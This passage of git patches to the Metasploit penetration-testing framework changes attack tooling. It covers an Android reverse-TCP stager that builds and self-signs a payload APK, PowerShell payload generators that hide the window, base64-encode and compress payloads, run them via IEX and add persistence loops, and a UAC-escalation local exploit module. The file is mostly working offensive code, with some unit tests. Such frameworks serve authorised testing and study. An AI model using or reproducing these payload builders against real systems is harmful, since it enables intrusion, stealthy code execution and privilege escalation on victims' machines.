-  def string_sub(data, placeholder, input)
-    data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
-  end
-  
-  def generate_jar(opts={})
-    jar = Rex::Zip::Jar.new
-
-    classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
-
-    string_sub(classes, 'ZZZZ                                ', "ZZZZhttps://" + datastore['LHOST'].to_s) if datastore['LHOST']
-    string_sub(classes, '4444                            ', datastore['LPORT'].to_s) if datastore['LPORT']
-    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
-    jar.add_file("classes.dex", fix_dex_header(classes))
-
-    files = [
-      [ "AndroidManifest.xml" ],
-      [ "res", "drawable-mdpi", "icon.png" ],
-      [ "res", "layout", "main.xml" ],
-      [ "resources.arsc" ]
-    ]
-
-    jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
-    jar.build_manifest
-
-    x509_name = OpenSSL::X509::Name.parse(
-      "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
-      )
-    key  = OpenSSL::PKey::RSA.new(1024)
-    cert = OpenSSL::X509::Certificate.new
-    cert.version = 2
-    cert.serial = 1
-    cert.subject = x509_name
-    cert.issuer = x509_name
-    cert.public_key = key.public_key
-
-    # Some time within the last 3 years
-    cert.not_before = Time.now - rand(3600*24*365*3)
-
-    # From http://developer.android.com/tools/publishing/app-signing.html
-    # """
-    # A validity period of more than 25 years is recommended.
-    #
-    # If you plan to publish your application(s) on Google Play, note
-    # that a validity period ending after 22 October 2033 is a
-    # requirement. You can not upload an application if it is signed
-    # with a key whose validity expires before that date.
-    # """
-    cert.not_after = cert.not_before + 3600*24*365*20 # 20 years
-
-    jar.sign(key, cert, [cert])
-
-    jar
-  end
- 
-end
diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb
index 005380bad3..d41922f40e 100644
--- a/modules/payloads/stagers/android/reverse_tcp.rb
+++ b/modules/payloads/stagers/android/reverse_tcp.rb
@@ -24,11 +24,6 @@ module Metasploit3
       'Handler'		=> Msf::Handler::ReverseTcp,
       'Stager'		=> {'Payload' => ""}
     ))
-
-    register_options(
-    [
-      OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
-    ], self.class)
   end
 
   def string_sub(data, placeholder, input)
@@ -42,7 +37,6 @@ module Metasploit3
 
     string_sub(classes, '127.0.0.1                       ', datastore['LHOST'].to_s) if datastore['LHOST']
     string_sub(classes, '4444                            ', datastore['LPORT'].to_s) if datastore['LPORT']
-    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
     jar.add_file("classes.dex", fix_dex_header(classes))
 
     files = [

From c9a2135959b6388ea6f73cb4fc63fdd716137c6c Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 2 Mar 2014 19:07:13 +0000
Subject: [PATCH 062/321] Merge in semperv

---
 lib/msf/core/exploit/powershell.rb | 127 ++++++++++++++++++-----------
 lib/rex/exploitation/powershell.rb | 121 +++++++++++++++++++--------
 2 files changed, 166 insertions(+), 82 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index e918e7fd4b..f28c94650b 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -4,27 +4,33 @@ require 'rex/exploitation/powershell'
 module Msf
 module Exploit::Powershell
 
-  class PshScript < Rex::Exploitation::Powershell::Script
+  class PowershellScript < Rex::Exploitation::Powershell::Script
   end
 
   def initialize(info = {})
     super
     register_advanced_options(
       [
-        OptBool.new('PSH::persist', [true, 'Run the payload in a loop', false]),
-        OptBool.new('PSH::old_technique', [true, 'Use powershell 1.0', false]),
-        OptBool.new('PSH::strip_comments', [false, 'Strip comments', true]),
-        OptBool.new('PSH::strip_whitespace', [false, 'Strip whitespace', false]),
-        OptBool.new('PSH::sub_vars', [false, 'Substitute variable names', false]),
-        OptBool.new('PSH::sub_funcs', [false, 'Substitute function names', false]),
+        OptBool.new('Powershell::persist', [true, 'Run the payload in a loop', false]),
+        OptBool.new('Powershell::prepend_sleep', [false, 'Prepend seconds of sleep']),
+        OptBool.new('Powershell::strip_comments', [false, 'Strip comments', true]),
+        OptBool.new('Powershell::strip_whitespace', [false, 'Strip whitespace', false]),
+        OptBool.new('Powershell::sub_vars', [false, 'Substitute variable names', false]),
+        OptBool.new('Powershell::sub_funcs', [false, 'Substitute function names', false]),
+        OptEnum.new('Powershell::method', [true, 'Payload delivery method', 'reflection', [
+          'net',
+          'reflection',
+          'old',
+          'msil'
+        ]]),
       ], self.class)
   end
 
   #
-  # Reads script into a PshScript
+  # Reads script into a PowershellScript
   #
   def read_script(script_path)
-    return PshScript.new(script_path)
+    return PowershellScript.new(script_path)
   end
 
   #
@@ -41,7 +47,7 @@ module Exploit::Powershell
       script.gsub!(set[0],set[1])
     end
 
-    return script
+    script
   end
 
   #
@@ -53,7 +59,8 @@ module Exploit::Powershell
     subs.split(';').each do |set|
       new_subs << set.split(',', 2)
     end
-    return new_subs
+
+    new_subs
   end
 
   #
@@ -62,13 +69,14 @@ module Exploit::Powershell
   #
   def encode_script(script_in, eof = nil)
     # Build script object
-    psh = PshScript.new(script_in)
+    psh = PowershellScript.new(script_in)
     # Invoke enabled modifiers
     datastore.select {|k,v| k =~ /^PSH::(strip|sub)/ and v == 'true' }.keys.map do |k|
       mod_method = k.split('::').last.intern
       psh.send(mod_method)
     end
-    return psh.encode_code(eof)
+
+    psh.encode_code(eof)
   end
 
   #
@@ -77,13 +85,14 @@ module Exploit::Powershell
   #
   def compress_script(script_in, eof = nil)
     # Build script object
-    psh = PshScript.new(script_in)
+    psh = PowershellScript.new(script_in)
     # Invoke enabled modifiers
     datastore.select {|k,v| k =~ /^PSH::(strip|sub)/ and v == 'true' }.keys.map do |k|
       mod_method = k.split('::').last.intern
       psh.send(mod_method)
     end
-    return psh.compress_code(eof)
+
+    psh.compress_code(eof)
   end
 
   #
@@ -101,14 +110,15 @@ module Exploit::Powershell
     end
 
     args = generate_psh_args(opts)
-    return "#{opts[:path]}#{binary} #{args}"
+
+    "#{opts[:path]}#{binary} #{args}"
   end
 
   #
   # Generate arguments for the powershell command
   #
   def generate_psh_args(opts)
-    arg_string = ""
+    arg_string = " "
     opts.each_pair do |arg, value|
       case arg
       when :encodedcommand
@@ -144,7 +154,7 @@ module Exploit::Powershell
     end
 
     # Shorten args if PSH 2.0+
-    unless datastore['PSH::old_technique']
+    unless datastore['Powershell::method'] == 'old'
       arg_string.gsub!(' -Command ', ' -c ')
       arg_string.gsub!(' -EncodedCommand ', ' -e ')
       arg_string.gsub!(' -ExecutionPolicy ', ' -ep ')
@@ -159,8 +169,10 @@ module Exploit::Powershell
       arg_string.gsub!(' -WindowStyle ', ' -w ')
     end
 
-    return arg_string
+    #Strip off first space character
+    arg_string[1..-1]
   end
+
   #
   # Runs powershell in hidden window raising interactive proc msg
   # Detect the architecture
@@ -178,7 +190,7 @@ module Exploit::Powershell
     end
 
     # Old technique fails if powershell exits..
-    arg_opts[:noexit] = true if datastore['PSH::old_technique']
+    arg_opts[:noexit] = true if datastore['PSH::method'] == 'old'
 
     ps_args = generate_psh_args(arg_opts)
 
@@ -193,6 +205,9 @@ $s=New-Object System.Diagnostics.ProcessStartInfo
 $s.FileName=$b
 $s.Arguments='#{ps_args}'
 $s.UseShellExecute=$false
+$si.RedirectStandardOutput=$true
+$si.WindowStyle='Hidden'
+$si.CreateNoWindow=$True
 $p=[System.Diagnostics.Process]::Start($s)
 EOS
     process_start_info.gsub!("\n",';')
@@ -208,13 +223,15 @@ if($a){$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'
 EOS
     archictecure_detection.gsub!("\n","")
 
-    return (archictecure_detection + process_start_info)
+    archictecure_detection + process_start_info
   end
 
   #
   # Creates cmd script to execute psh payload
   #
   def cmd_psh_payload(pay, payload_arch, opts={})
+    opts[:persist] ||= datastore['Powershell::persist']
+    opts[:prepend_sleep] ||= datastore['Powershell::prepend_sleep']
 
     if opts[:encode_inner_payload] && opts[:encode_final_payload]
       raise RuntimeError, ":encode_inner_payload and :encode_final_payload are incompatible options"
@@ -224,15 +241,19 @@ EOS
       raise RuntimeError, ":no_equals requires :encode_final_payload option to be used"
     end
 
-    # Allow powershell 1.0 format
-    if opts[:old_psh] || datastore['PSH::old_technique']
-      psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
-    else
-      psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
+    psh_payload = case datastore['PSH::method']
+    when 'net'
+      Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
+    when 'reflection'
+      Msf::Util::EXE.to_win32pe_psh_reflection(framework, pay)
+    when 'old'
+      Msf::Util::EXE.to_win32pe_psh(framework, pay)
+    when 'msil'
+      raise RuntimeError, "MSIL Powershell Technique no longer exists"
     end
 
     # Run our payload in a while loop
-    if datastore['PSH::persist']
+    if opts[:persist]
       fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
       sleep_time = rand(5)+5
       vprint_status("Sleep time set to #{sleep_time} seconds")
@@ -240,6 +261,14 @@ EOS
       psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
     end
 
+    if opts[:prepend_sleep]
+      if opts[:prepend_sleep].to_i > 0
+        psh_payload = "Start-Sleep -s #{opts[:prepend_sleep]};" << psh_payload
+      else
+        vprint_error('Sleep time must be greater than 0 seconds')
+      end
+    end
+
     compressed_payload = compress_script(psh_payload)
     encoded_payload = encode_script(psh_payload)
 
@@ -297,7 +326,7 @@ EOS
     if opts[:remove_comspec]
       command = psh_command
     else
-      command = "%COMSPEC% /b /c #{psh_command}"
+      command = "%COMSPEC% /b /c start /min #{psh_command}"
     end
 
     vprint_status("Powershell command length: #{command.length}")
@@ -305,7 +334,7 @@ EOS
       raise RuntimeError, "Powershell command length is greater than the command line maximum (8192 characters)"
     end
 
-    return command
+    command
   end
 
 
@@ -337,23 +366,24 @@ EOS
       return %Q^ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$^
     end
 
-	#
-	# Convert binary to byte array, read from file if able
-	#
-	def build_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
-		code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
-		code = code.unpack('C*')
-		psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
-		lines = []
-		1.upto(code.length-1) do |byte|
-			if(byte % 10 == 0)
-				lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
-			else
-				lines.push ",0x#{code[byte].to_s(16)}"
-			end
-		end
-		psh << lines.join("") + "\r\n"
-	end
+    #
+    # Convert binary to byte array, read from file if able
+    #
+    def self.to_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
+      code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
+      code = code.unpack('C*')
+      psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
+      lines = []
+      1.upto(code.length-1) do |byte|
+        if(byte % 10 == 0)
+          lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
+        else
+          lines.push ",0x#{code[byte].to_s(16)}"
+        end
+      end
+
+      return psh << lines.join("") + "\r\n"
+    end
 
     #
     # Find PID of file locker
@@ -362,10 +392,13 @@ EOS
       return %Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#{filename}"){$processVar.Name + " PID:" + $processVar.id}}}^
     end
 
-
+    #
+    # Return last time of login for each user
+    #
     def self.get_last_login(user)
       return %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^
     end
+
   end
 end
 end
diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index 28424cbc46..ce3f198f0e 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -29,23 +29,45 @@ module Powershell
       return numbered
     end
 
-    #
-    # Return a Base64 encoded powershell code
-    #
-    def encode_code(eof = nil)
-      # Convert expression to unicode
-      unicode_expression = Rex::Text.to_unicode(code)
-
-      # Base64 encode the unicode expression
-      @code = Rex::Text.encode_base64(unicode_expression)
-
-      return code
-    end
-
     #
     # Return a zlib compressed powershell code
     #
-    def compress_code(eof = nil)
+    def deflate_code(eof = nil)
+      # Compress using the Deflate algorithm
+      compressed_stream = ::Zlib::Deflate.deflate(code,
+      ::Zlib::BEST_COMPRESSION)
+
+      # Base64 encode the compressed file contents
+      encoded_stream = Rex::Text.encode_base64(compressed_stream)
+
+      # Build the powershell expression
+      # Decode base64 encoded command and create a stream object
+      psh_expression =  "$s=New-Object IO.MemoryStream(,"
+      psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
+      # Read & delete the first two bytes due to incompatibility with MS
+      psh_expression << "$stream.ReadByte()|Out-Null;"
+      psh_expression << "$stream.ReadByte()|Out-Null;"
+      # Uncompress and invoke the expression (execute)
+      psh_expression << "$(IEX $(New-Object IO.StreamReader("
+      psh_expression << "$(New-Object IO.Compression.DeflateStream("
+      psh_expression << "$s,"
+      psh_expression << "[IO.Compression.CompressionMode]::Decompress)),"
+      psh_expression << "[Text.Encoding]::ASCII)).ReadToEnd());"
+
+      # If eof is set, add a marker to signify end of code output
+      #if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
+      psh_expression << "echo '#{eof}';" if eof
+
+      @code = psh_expression
+
+      psh_expression
+    end
+
+
+    #
+    # Return a gzip compressed powershell code
+    #
+    def gzip_code(eof = nil)
       # Compress using the Deflate algorithm
       compressed_stream = Rex::Text.gzip(code)
 
@@ -66,18 +88,32 @@ module Powershell
 
       @code = psh_expression
 
-      return psh_expression
+      psh_expression
+    end
+
+    #
+    # Compresses script contents with gzip or deflate
+    #
+    def compress_code(eof = nil, gzip = true, in_place = true)
+      code = gzip ? gzip_code(eof) : deflate_code(eof)
+      @code = code if in_place
+      return code
     end
 
     #
     # Reverse the compression process
+    # Try gzip, inflate if that fails
     #
     def decompress_code
+      # Decode base64 and convert to ascii
+      raw = Rex::Text.decode_base64(code)
+      ascii_expression = Rex::Text.to_ascii(raw)
       # Extract substring with payload
       encoded_stream = ascii_expression.scan(/FromBase64String\('(.*)'/).flatten.first
       # Decode and decompress the string
-      return Rex::Text.ungzip( Rex::Text.decode_base64(encoded_stream) )
-      # ::Zlib::Inflate.inflate( Rex::Text.decode_base64(encoded_stream) )
+      @code = ( Rex::Text.ungzip( Rex::Text.decode_base64(encoded_stream) ) ||
+        Rex::Text.zlib_inflate( Rex::Text.decode_base64(encoded_stream)) )
+      return code
     end
   end
 
@@ -144,6 +180,7 @@ module Powershell
         '$WhatIfPreference'
       ].map(&:downcase)
 
+      # return code.scan(/\$[a-zA-Z\-\_]+/).uniq.flatten - res_vars
 
       our_vars = code.scan(/\$[a-zA-Z\-\_]+/).uniq.flatten.map(&:strip)
       return our_vars.select {|v| !res_vars.include?(v)}
@@ -243,7 +280,17 @@ module Powershell
       # Multi line
       code.gsub!(/<#(.*?)#>/m,'')
       # Single line
-      code.gsub!(/^#.*$|^\s+#.*$/,'')
+      code.gsub!(/^\s*#(?!.*region)(.*$)/i,'')
+    end
+
+    #
+    # Remove empty lines
+    #
+    def strip_empty_lines
+      # Windows EOL
+      code.gsub!(/[\r\n]+/,"\r\n")
+      # UNIX EOL
+      code.gsub!(/[\n]+/,"\n")
     end
 
     #
@@ -254,7 +301,6 @@ module Powershell
       code.gsub!(/\s+/,' ')
     end
 
-
     #
     # Identify variables and replace them
     #
@@ -349,7 +395,21 @@ module Powershell
     # Pretend we are actually a string
     extend Forwardable
     # In case someone messes with String we delegate based on its instance methods
-    eval %Q|def_delegators :@code, :#{::String.instance_methods[0..(String.instance_methods.index(:class)-1)].join(', :')}|
+    #eval %Q|def_delegators :@code, :#{::String.instance_methods[0..(String.instance_methods.index(:class)-1)].join(', :')}|
+    def_delegators :@code, :each_line, :strip, :chars, :intern, :chr, :casecmp, :ascii_only?, :<, :tr_s,
+                   :!=, :capitalize!, :ljust, :to_r, :sum, :private_methods, :gsub,:dump, :match, :to_sym,
+                   :enum_for, :display, :tr_s!, :freeze, :gsub, :split, :rindex, :<<, :<=>, :+, :lstrip!,
+                   :encoding, :start_with?, :swapcase, :lstrip!, :encoding, :start_with?, :swapcase,
+                   :each_byte, :lstrip, :codepoints, :insert, :getbyte, :swapcase!, :delete, :rjust, :>=,
+                   :!, :count, :slice, :clone, :chop!, :prepend, :succ!, :upcase, :include?, :frozen?,
+                   :delete!, :chop, :lines, :replace, :next, :=~, :==, :rstrip!, :%, :upcase!, :each_char,
+                   :hash, :rstrip, :length, :reverse, :setbyte, :bytesize, :squeeze, :>, :center, :[],
+                   :<=, :to_c, :slice!, :chomp!, :next!, :downcase, :unpack, :crypt, :partition,
+                   :between?, :squeeze!, :to_s, :chomp, :bytes, :clear, :!~, :to_i, :valid_encoding?, :===,
+                   :tr, :downcase!, :scan, :sub!, :each_codepoint, :reverse!, :class, :size, :empty?, :byteslice,
+                   :initialize_clone, :to_str, :to_enum,:tap, :tr!, :trust, :encode!, :sub, :oct, :succ, :index,
+                   :[]=, :encode, :*, :hex, :to_f, :strip!, :rpartition, :ord, :capitalize, :upto, :force_encoding,
+                   :end_with?
 
     # def method_missing(meth, *args, &block)
     #   code.send(meth,*args,&block) || (raise NoMethodError.new, meth)
@@ -379,12 +439,11 @@ module Powershell
     ##
 
     #
-    # Convert binary to byte array, read from file if able
+    # Build a byte array to load into powershell code
     #
-    def self.to_byte_array(input_data,var_name="buf")
-      return "[Byte[]]$#{name} = ''" if input_data.nil? or input_data.empty?
-
-      code = input_data.unpack('C*')
+    def self.build_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
+      code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
+      code = code.unpack('C*')
       psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
       lines = []
       1.upto(code.length-1) do |byte|
@@ -394,16 +453,7 @@ module Powershell
           lines.push ",0x#{code[byte].to_s(16)}"
         end
       end
-
-      return psh << lines.join("") + "\r\n"
-    end
-
-    #
-    # Build a byte array to load into powershell code
-    #
-    def self.build_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
-      code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
-      return to_byte_array(input_data,var_name)
+      psh << lines.join("") + "\r\n"
     end
 
     def self.psp_funcs(dir)
@@ -423,3 +473,4 @@ module Powershell
 end
 end
 end
+

From 1ca690eccf8b3d13059246c8256ce64c68f61921 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 2 Mar 2014 20:37:08 +0000
Subject: [PATCH 063/321] Do some rspec

---
 lib/msf/core/exploit/powershell.rb      |  20 ++++-
 spec/lib/msf/core/exploit/powershell.rb | 100 ++++++++++++++++++++++++
 2 files changed, 116 insertions(+), 4 deletions(-)
 create mode 100644 spec/lib/msf/core/exploit/powershell.rb

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index f28c94650b..c1251d32d8 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -99,7 +99,7 @@ module Exploit::Powershell
   # Generate a powershell command line
   #
   def generate_psh_command_line(opts)
-    if opts[:path] and opts[:path][-1,1] == "\\"
+    if opts[:path] and (opts[:path][-1,1] != "\\")
       opts[:path] << "\\"
     end
 
@@ -116,8 +116,16 @@ module Exploit::Powershell
 
   #
   # Generate arguments for the powershell command
+  # The format will be have no space at the start and have a space
+  # afterwards e.g. "-Arg1 x -Arg -Arg x "
   #
   def generate_psh_args(opts)
+    return "" unless opts
+
+    unless opts.has_key? :shorten
+      opts[:shorten] = (datastore['Powershell::method'] != 'old')
+    end
+
     arg_string = " "
     opts.each_pair do |arg, value|
       case arg
@@ -153,8 +161,8 @@ module Exploit::Powershell
       arg_string << "-Command #{opts[:command]}"
     end
 
-    # Shorten args if PSH 2.0+
-    unless datastore['Powershell::method'] == 'old'
+    # Shorten arg if PSH 2.0+
+    if opts[:shorten]
       arg_string.gsub!(' -Command ', ' -c ')
       arg_string.gsub!(' -EncodedCommand ', ' -e ')
       arg_string.gsub!(' -ExecutionPolicy ', ' -ep ')
@@ -170,7 +178,11 @@ module Exploit::Powershell
     end
 
     #Strip off first space character
-    arg_string[1..-1]
+    arg_string = arg_string[1..-1]
+    #Remove final space character
+    arg_string = arg_string[0..-2] if (arg_string[-1] == " ")
+
+    arg_string
   end
 
   #
diff --git a/spec/lib/msf/core/exploit/powershell.rb b/spec/lib/msf/core/exploit/powershell.rb
new file mode 100644
index 0000000000..34da695706
--- /dev/null
+++ b/spec/lib/msf/core/exploit/powershell.rb
@@ -0,0 +1,100 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+
+describe Msf::Exploit::Powershell do
+  let(:datastore) { { } }
+  subject do
+    mod = Module.new
+    mod.extend described_class
+    mod.stub(
+      :datastore => datastore
+    )
+
+    mod
+  end
+
+  describe "::generate_psh_command_line" do
+    it 'should contain no full stop when :no_full_stop' do
+      opts = {:no_full_stop => true}
+      command = subject.generate_psh_command_line(opts)
+      command.include?("powershell ").should be_true
+    end
+
+    it 'should contain full stop unless :no_full_stop' do
+      opts = {}
+      command = subject.generate_psh_command_line(opts)
+      command.include?("powershell.exe ").should be_true
+
+      opts = {:no_full_stop => false}
+      command = subject.generate_psh_command_line(opts)
+      command.include?("powershell.exe ").should be_true
+    end
+
+    it 'should ensure the path should always ends with \\' do
+      opts = {:path => "test"}
+      command = subject.generate_psh_command_line(opts)
+      command.include?("test\\powershell.exe ").should be_true
+
+      opts = {:path => "test\\"}
+      command = subject.generate_psh_command_line(opts)
+      command.include?("test\\powershell.exe ").should be_true
+    end
+  end
+
+  describe "::generate_psh_args" do
+    it 'should return empty string for nil opts' do
+      subject.generate_psh_args(nil).should eql ""
+    end
+
+    command_args = [[:encodedcommand, "parp"],
+                    [:executionpolicy, "bypass"],
+                    [:inputformat, "xml"],
+                    [:file, "x"],
+                    [:noexit, true],
+                    [:nologo, true],
+                    [:noninteractive, true],
+                    [:mta, true],
+                    [:outputformat, 'xml'],
+                    [:sta, true],
+                    [:noprofile, true],
+                    [:windowstyle, "hidden"],
+                    [:command, "Z"]
+    ]
+
+    permutations = (0..command_args.length).to_a.combination(2).map{|i,j| command_args[i...j]}
+
+    permutations.each do |perms|
+      opts = {}
+      perms.each do |k,v|
+        opts[k] = v
+        it "should generate correct arguments for #{opts}" do
+          opts[:shorten] = true
+          short_args = subject.generate_psh_args(opts)
+          opts[:shorten] = false
+          long_args = subject.generate_psh_args(opts)
+
+          opt_length = opts.length - 1
+
+          short_args.should_not be_nil
+          long_args.should_not be_nil
+          short_args.count('-').should eql opt_length
+          long_args.count('-').should eql opt_length
+          short_args[0].should_not eql " "
+          long_args[0].should_not eql " "
+          short_args[-1].should_not eql " "
+          long_args[-1].should_not eql " "
+
+          if opts[:command]
+            long_args[-10..-1].should eql "-Command Z"
+            short_args[-4..-1].should eql "-c Z"
+          end
+       end
+      end
+    end
+  end
+
+end
+

From 0956ae5789cef156945b22a249ef02943c4641e1 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 2 Mar 2014 20:56:55 +0000
Subject: [PATCH 064/321] Fix payload selection

---
 lib/msf/core/exploit/powershell.rb | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index c1251d32d8..65a3b28fa7 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -244,6 +244,7 @@ EOS
   def cmd_psh_payload(pay, payload_arch, opts={})
     opts[:persist] ||= datastore['Powershell::persist']
     opts[:prepend_sleep] ||= datastore['Powershell::prepend_sleep']
+    opts[:method] ||= datastore['Powershell::method']
 
     if opts[:encode_inner_payload] && opts[:encode_final_payload]
       raise RuntimeError, ":encode_inner_payload and :encode_final_payload are incompatible options"
@@ -253,7 +254,7 @@ EOS
       raise RuntimeError, ":no_equals requires :encode_final_payload option to be used"
     end
 
-    psh_payload = case datastore['PSH::method']
+    psh_payload = case opts[:method]
     when 'net'
       Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
     when 'reflection'
@@ -261,7 +262,9 @@ EOS
     when 'old'
       Msf::Util::EXE.to_win32pe_psh(framework, pay)
     when 'msil'
-      raise RuntimeError, "MSIL Powershell Technique no longer exists"
+      raise RuntimeError, "MSIL Powershell method no longer exists"
+    else
+      raise RuntimeError, "No Powershell method specified"
     end
 
     # Run our payload in a while loop

From 2acd0a1b1e63d7bc7756ecc75c2ec300742b401d Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 2 Mar 2014 21:03:31 +0000
Subject: [PATCH 065/321] Reinstance encode_code

---
 lib/rex/exploitation/powershell.rb | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index ce3f198f0e..e477f12360 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -63,6 +63,15 @@ module Powershell
       psh_expression
     end
 
+    #
+    # Return Base64 encoded powershell code
+    #
+    def encode_code(eof = nil)
+      unicode_expression = Rex::Text.to_unicode(code)
+      @code = Rex::Text.encode_base64(unicode_expression)
+
+      code
+    end
 
     #
     # Return a gzip compressed powershell code

From 8dee9b22c31bbac88178fc76c867d45c5b7f2519 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 2 Mar 2014 22:07:47 +0000
Subject: [PATCH 066/321] Reinstate to_byte_array

---
 lib/rex/exploitation/powershell.rb | 20 +++++++++++++++-----
 1 file changed, 15 insertions(+), 5 deletions(-)

diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index e477f12360..8effc6d3c1 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -448,11 +448,12 @@ module Powershell
     ##
 
     #
-    # Build a byte array to load into powershell code
+    # Convert binary to byte array
     #
-    def self.build_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
-      code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
-      code = code.unpack('C*')
+    def self.to_byte_array(input_data,var_name="buf")
+      return "[Byte[]]$#{name} = ''" if input_data.nil? or input_data.empty?
+
+      code = input_data.unpack('C*')
       psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
       lines = []
       1.upto(code.length-1) do |byte|
@@ -462,7 +463,16 @@ module Powershell
           lines.push ",0x#{code[byte].to_s(16)}"
         end
       end
-      psh << lines.join("") + "\r\n"
+
+      return psh << lines.join("") + "\r\n"
+    end
+
+    #
+    # Build a byte array to load into powershell code
+    #
+    def self.build_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
+      code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
+      return to_byte_array(code, var_name)
     end
 
     def self.psp_funcs(dir)

From 04506d76f3f3efd7abe4c00819fd660d24c50990 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 22 Mar 2014 17:57:27 +0000
Subject: [PATCH 067/321] Dont check for admin

---
 modules/exploits/windows/local/ask.rb | 46 +++++++--------------------
 1 file changed, 11 insertions(+), 35 deletions(-)

diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb
index 6f9f79e06d..86f11f7718 100644
--- a/modules/exploits/windows/local/ask.rb
+++ b/modules/exploits/windows/local/ask.rb
@@ -45,53 +45,29 @@ class Metasploit3 < Msf::Exploit::Local
 
   end
 
-  def check
-    session.readline
-    print_status('Checking admin status...')
-    admin_group = is_in_admin_group?
-    if admin_group.nil?
-      print_error('Either whoami is not there or failed to execute')
-      print_error('Continuing under assumption you already checked...')
-      return Exploit::CheckCode::Unknown
-    else
-      if admin_group
-        print_good('Part of Administrators group! Continuing...')
-        return Exploit::CheckCode::Vulnerable
-      else
-        print_error("Not in admins group, cannot escalate with this module")
-        return Exploit::CheckCode::Safe
-      end
-    end
-  end
-
   def exploit
-    admin_check = check
-    if admin_check.join =~ /safe/
-      fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
-    end
+
     if is_uac_enabled?
       print_status "UAC is Enabled, checking level..."
-    else
-      if is_in_admin_group?
-        fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")
-      else
-        fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
-      end
-    end
-    case get_uac_level
+      case get_uac_level
       when UAC_NO_PROMPT
         print_good "UAC is not enabled, no prompt for the user"
       else
         print_status "The user will be prompted, wait for them to click 'Ok'"
+      end
+    else
+      print_good "UAC is not enabled, no prompt for the user"
     end
+
     #
     # Generate payload and random names for upload
     #
     case datastore["TECHNIQUE"]
-      when "EXE"
-        execute_exe(datastore["FILENAME"],datastore["PATH"],datastore["UPLOAD"])
-      when "PSH"
-        execute_psh
+    when "EXE"
+      execute_exe(datastore["FILENAME"],datastore["PATH"],datastore["UPLOAD"])
+    when "PSH"
